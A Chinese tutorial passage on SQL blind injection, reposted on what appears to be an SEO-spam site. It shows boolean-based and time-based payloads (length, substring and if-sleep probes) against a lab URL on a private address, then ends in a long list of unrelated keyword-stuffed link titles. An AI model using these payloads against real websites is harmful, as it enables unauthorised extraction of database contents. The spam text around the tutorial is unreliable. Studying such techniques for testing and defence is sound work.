当前位置: 首页 > news >正文

免费的短视频app有哪些云seo

免费的短视频app有哪些,云seo,wordpress换身 变身,男女做那个视频的网站sql 注入, 盲注 盲注适合在页面没有任何回显时使用. 测试页面有变化, 但是没有显示任何异常错误等信息. 情景: url: http://192.168.112.200/security/read.php?id1 服务器数据库名: learn一, boolean盲注 # 盲注可能需要一个一个字符去试探, 字符串处理函数经常会用到. 比…

sql 注入, 盲注

盲注适合在页面没有任何回显时使用.
测试页面有变化, 但是没有显示任何异常错误等信息.

情景:
url: http://192.168.112.200/security/read.php?id=1
服务器数据库名: learn

一, boolean盲注

# 盲注可能需要一个一个字符去试探, 字符串处理函数经常会用到. 比如:
length(n)                 字符串长度
mid(str, start, n)        从start开始截取n个字符, start从1开始
substring(str, start, n)  从start开始截取n个字符, start从1开始
left(str, n)              从左侧开始截取n个字符
right(str, n)             从右侧开始截取n个字符
ord()                     字符的ascii码
ascii()                   字符的ascii码
1. 猜测长度
# 利用比较运算判断数据库名称的长度
http://.../?id=1 and length( database() ) < 10 # 页面正常
http://.../?id=1 and length( database() ) < 5  # 页面异常
http://.../?id=1 and length( database() ) = 5  # 页面正常, 数据库名长度是5.
2. 猜测字符

利用 substring() 等函数, 判断名称中的字母, 范围包括大写或小写字母, 数字, 下划线等.
可以使用python脚本或者burpsuit来做爆破.

# 猜测数据库名第一个字母
http://.../?id=1 and substring( database(), 1, 1 ) = 'a' # 页面异常
http://.../?id=1 and substring( database(), 1, 1 ) = 'c' # 页面异常
http://.../?id=1 and substring( database(), 1, 1 ) = 'l' # 页面正常, 数据库名首字母是 l
# 猜测第二个字母
http://.../?id=1 and substring( database(), 2, 1 ) = 'e' # 页面正常, 数据库第二个字母是 e
http://.../?id=1 and substring( database(), 2, 1 ) = 'E' # 页面正常, 到底是大写还是小写 ?# 这里为了区分大小写, 使用 binary 更准确
http://.../?id=1 and binary substring( database(), 2, 1 ) = 'e' # 页面正常
http://.../?id=1 and binary substring( database(), 2, 1 ) = 'E' # 页面异常# 猜测第三个字母
...

二, 时间型盲注

boolean盲注可以通过页面的变化来判断, 如果测试时, 无论使用什么代码, 页面没有任何变化, 就需要尝试时间盲注.
在真假判断的基础上添加时间判断.

原理:

if(表达式, 语句1, 语句2) 函数的规则:
如果 [表达式] 是真, 则执行 [语句1] , 否则执行 [语句2] .

使用if函数, 对boolean盲注[表达式]做判断, 将延迟时间设置到[语句1],
如果boolean盲注[表达式]猜对了, sql会执行[语句1] 进入延迟, 否则sql会立刻执行[语句2].
所以通过注入后页面的延迟时间可以判断出boolean盲注的猜测是否成功.

案例:
# 猜测数据库的名称长度
http://.../?id=1 and if( length(database())<10, sleep(5), 1) # 页面有明显延迟, 说明猜对
http://.../?id=1 and if( length(database())<5, sleep(5), 1)  # 页面响应不到5秒, 说明猜错
http://.../?id=1 and if( length(database())=5, sleep(5), 1)  # 页面有明显延迟, 说明猜对, 那么长度是5
http://www.dinnco.com/news/54871.html

相关文章:

  • 电子商务平台经营者制定平台服务协议和交易规则时关键词整站优化
  • 网站优化是外包还是自己做网店推广的作用是
  • 不会编程 做网站前端性能优化
  • 做网站电商山西太原百度公司
  • 在线免费logo设计网站semikron
  • 做计划的网站网站收录查询入口
  • 滕建建设集团网站网络营销与策划
  • 建筑铝模板多少钱一平方米seo搜索铺文章
  • 珠海网站制作推广邀请注册推广赚钱
  • 搭建电商分销系统天津seo博客
  • 杭州网站现场备案如何做推广呢
  • 订单查询网站怎么做头条新闻 最新消息条
  • 安徽观元建设有限公司网站徐州百度快照优化
  • edu域名网站百度推广一年收费标准
  • 网站建设填空题培训方案怎么做
  • 动漫制作专业学什么关键词诊断优化全部关键词
  • 网站建设千套素材海南seo代理加盟供应商
  • 58网站怎么样做效果会更好今日头条搜索优化怎么做
  • 在线教育网站html模板经典营销案例100例
  • 北京2023年疫情最新消息网站seo外链
  • 单机怎么做网站公司网站制作要多少钱
  • 做网站 编程语言新郑网络推广外包
  • 佛山新网站建设服务如何开通自己的网站
  • 蓝色机械营销型网站在线注册免费域名
  • 网站框架图怎么做本周新闻热点10条
  • 北京网站开发飞沐海外市场推广做什么的
  • 做域名代理网站北京sem
  • 凡科做网站多少钱网络营销专业大学排名
  • 版纳网站建设品牌营销策略有哪些
  • 哈尔滨建设集团有限公司深圳百度seo代理